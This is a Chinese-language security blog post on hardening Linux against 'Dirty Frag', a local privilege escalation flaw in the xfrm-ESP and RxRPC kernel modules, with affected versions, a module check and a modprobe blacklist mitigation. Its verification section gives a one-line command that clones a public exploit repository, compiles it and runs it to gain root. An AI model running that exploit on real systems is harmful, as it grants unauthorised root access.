Dirty Frag(通用 Linux 本地提权漏洞)加固
546 字
3 分钟
Dirty Frag(通用 Linux 本地提权漏洞)加固
漏洞概述
Dirty Frag 是一个通用 Linux 本地提权漏洞,与脏管道(Dirty Pipe)、Copy Fail 属于同一系列漏洞大类。其为确定性逻辑漏洞,不依赖时间竞争窗口、无需竞态条件;漏洞利用失败时不会触发内核崩溃,且整体利用成功率极高。
该漏洞存在于两个内核模块中:
- xfrm-ESP 页缓存写入漏洞:影响内核提交
cac2661c53f3(2017-01-17)至今的所有上游内核版本 - RxRPC 页缓存写入漏洞:影响内核提交
2dc334f1a63a(2023 年 6 月)至今的所有上游内核版本
简言之,该漏洞整体影响周期长达约 9 年。
受影响版本
已在以下主流发行版版本中实测可利用:
- Ubuntu 24.04.4:6.17.0-23-generic
- RHEL 10.1:6.12.0-124.49.1.el10_1.x86_64
- openSUSE Tumbleweed:7.0.2-1-default
- CentOS Stream 10:6.12.0-224.el10.x86_64
- AlmaLinux 10:6.12.0-124.52.3.el10_1.x86_64
- Fedora 44:6.19.14-300.fc44.x86_64
验证系统是否受影响
检查模块是否加载
lsmod | grep -E 'esp4|esp6|rxrpc'若有输出,说明相关模块已加载,系统可能受影响。
验证POC
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp成功则获得root权限。
警告:此操作仅应在测试环境中进行。
修复建议
立即更新
因负责任的漏洞披露流程及保密协议已提前失效,目前所有 Linux 发行版均无官方补丁。建议密切关注各发行版的安全公告,在官方补丁发布后立即更新内核。
临时缓解措施
在官方补丁发布前,可执行以下命令,禁用存在漏洞的内核模块做临时防护:
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"注意:此操作会禁用 esp4、esp6 和 rxrpc 内核模块,可能影响依赖这些模块的网络功能(如 IPsec VPN、RxRPC 相关服务)。
总结
Dirty Frag 是一个严重的 Linux 内核本地提权漏洞,影响范围广、利用成功率高。建议尽快采取以下措施:
- 检查系统是否受影响
- 密切关注官方安全公告,在补丁发布后立即更新内核
- 在补丁发布前,实施临时缓解措施
- 持续监控系统安全状态
文章分享
如果这篇文章对你有帮助,欢迎分享给更多人!
Dirty Frag(通用 Linux 本地提权漏洞)加固
https://blog.cllll.link/posts/dirty-frag-linux-local-privilege-escalation/ 相关文章 智能推荐
1
Copy Fail(CVE-2026-31431)加固
安全研究 关于 CVE-2026-31431 Copy Fail 漏洞的加固指南
2
安服驻场指南:应急响应
安全研究 详细介绍安全服务人员驻场应急响应的完整流程、排查方法和报告编写规范。
3
DNS查询利器:dig工具完全指南
技术教程 详细介绍 DNS 查询工具 dig 的使用方法、输出解读和网络诊断技巧。
4
macOS nettop 工具指南
技术教程 详细介绍 macOS 系统中 nettop 命令的使用方法、输出解读和网络诊断技巧。
5
CISP 笔记七:信息安全支撑技术
技术教程 详细介绍密码学、身份鉴别和访问控制等信息安全支撑技术,基于 CISP 认证考试内容整理。
随机文章 随机推荐
Hello, World!
音乐
暂未播放
0:00 0:00
17
3
48
27,020
0 天
0 天前